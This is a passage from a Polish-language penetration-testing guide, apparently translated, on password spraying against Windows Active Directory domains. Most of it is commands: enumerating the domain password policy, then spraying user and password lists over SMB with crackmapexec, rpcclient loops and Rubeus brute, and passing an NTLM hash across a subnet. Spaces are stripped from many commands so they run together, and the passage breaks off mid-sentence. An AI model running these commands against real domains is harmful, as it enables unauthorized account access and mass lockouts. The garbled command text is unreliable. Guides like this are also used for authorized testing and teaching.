Gdy znajdziesz kilka ważnych nazw użytkowników, możesz spróbować najczęściej używanych haseł (pamiętaj o polityce haseł w danym środowisku) dla każdego z odkrytych użytkowników.
Zgodnie z domyślnymi ustawieniamiminimalnadługośćhasła wynosi 7.
Zauważ, że możesz zablokować niektóre konta, jeśli spróbujesz kilku błędnych haseł (domyślnie więcej niż 10).
Get password policy
Jeśli masz jakieś dane logowania użytkownika lub powłokę jako użytkownik domeny, możesz uzyskać politykę haseł za pomocą:
# From Linuxcrackmapexec<IP>-u'user'-p'password'--pass-polenum4linux-u'username'-p'password'-P<IP>rpcclient-U""-N10.10.10.10;rpcclient $>querydominfoldapsearch-h10.10.10.10-x-b"DC=DOMAIN_NAME,DC=LOCAL"-ssub"*"|grep-m1-B10pwdHistoryLength# From Windowsnetaccounts(Get-DomainPolicy)."SystemAccess"#From powerview
Eksploatacja z Linuxa (lub wszystkich)
Używając crackmapexec:
crackmapexecsmb<IP>-uusers.txt-ppasswords.txt# Local Auth Spray (once you found some local admin pass or hash)## --local-auth flag indicate to only try 1 time per machinecrackmapexecsmb--local-auth10.10.10.10/23-uadministrator-H10298e182387f9cab376ecd08491764a0|grep+
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/for u in $(catusers.txt); dorpcclient-U"$u%Welcome1"-c"getusername;quit"10.10.10.10|grepAuthority;done
# with a list of users.\Rubeus.exebrute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exebrute/passwords:<passwords_file>/outfile:<output_file>
Z Invoke-DomainPasswordSpray (Może domyślnie generować użytkowników z domeny i pobiera politykę haseł z domeny oraz ograniczać próby zgodnie z nią):